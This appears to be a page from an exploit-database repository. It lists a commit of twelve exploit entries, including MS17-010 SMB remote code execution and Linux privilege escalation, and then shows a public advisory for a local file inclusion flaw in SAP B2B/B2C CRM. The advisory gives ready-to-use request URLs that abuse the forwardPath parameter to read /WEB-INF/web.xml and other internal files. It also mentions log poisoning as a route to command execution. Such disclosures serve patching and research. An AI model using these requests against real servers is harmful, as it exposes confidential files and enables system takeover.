41ea196761
12 changes to exploits/shellcodes Microsoft Edge - 'Array.filter' Info Leak Microsoft Edge - 'Array.filter' Information Leak Microsoft Edge Chakra JIT - Bound Check Elimination Bug Windows - Local Privilege Escalation Windows WMI - Recieve Notification Exploit (Metasploit) Microsoft Windows - Local Privilege Escalation Microsoft Windows WMI - Recieve Notification Exploit (Metasploit) Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC) Prime95 29.4b8 - Stack Buffer Overflow (SEH) DynoRoot DHCP - Client Command Injection Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit) Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) HPE iMC 7.3 - Remote Code Execution (Metasploit) Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery Monstra CMS before 3.0.4 - Cross-Site Scripting SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery Cisco SA520W Security Appliance - Path Traversal SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
43 lines
No EOL
1.4 KiB
Text
43 lines
No EOL
1.4 KiB
Text
# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
|
|
# Application:SAP B2B OR B2C is CRM
|
|
# Versions Affected: SAP B2B OR B2C is CRM 2.x 3.x and 4.x with Bakend R/3 (to icss_b2b)
|
|
# Vendor URL: http://SAP.com
|
|
# Bugs: SAP LFI in B2B OR B2C CRM
|
|
# Sent: 2018-05-03
|
|
# Reported: 2018-05-03
|
|
# Date of Public Advisory: 2018-02-09
|
|
# Reference: SAP Security Note 1870255656
|
|
# Author: Richard Alviarez
|
|
|
|
# 1. VULNERABLE PACKAGES
|
|
# SAP LFI in B2B OR B2C CRM v2.x to 4.x
|
|
# Other versions are probably affected too, but they were not checked.
|
|
|
|
# 2. TECHNICAL DESCRIPTION
|
|
# A possible attacker can take advantage of this vulnerability
|
|
# to obtain confidential information of the platform,
|
|
# as well as the possibility of writing in the logs of the
|
|
# registry in order to get remote execution of commands and take control of the system.
|
|
|
|
|
|
# 3. Steps to exploit this vulnerability
|
|
|
|
A. Open
|
|
https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml
|
|
|
|
Other vulnerable parameters:
|
|
|
|
https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml
|
|
https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml
|
|
https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml
|
|
page on SAP server
|
|
|
|
B. Change parameter {name} for example icss_b2b or other name....
|
|
|
|
C. Change "/WEB-INF/web.xml" for other files or archives internal.
|
|
|
|
|
|
# 4. Collaborators
|
|
# - CuriositySec
|
|
# - aDoN90
|
|
# - Vis0r |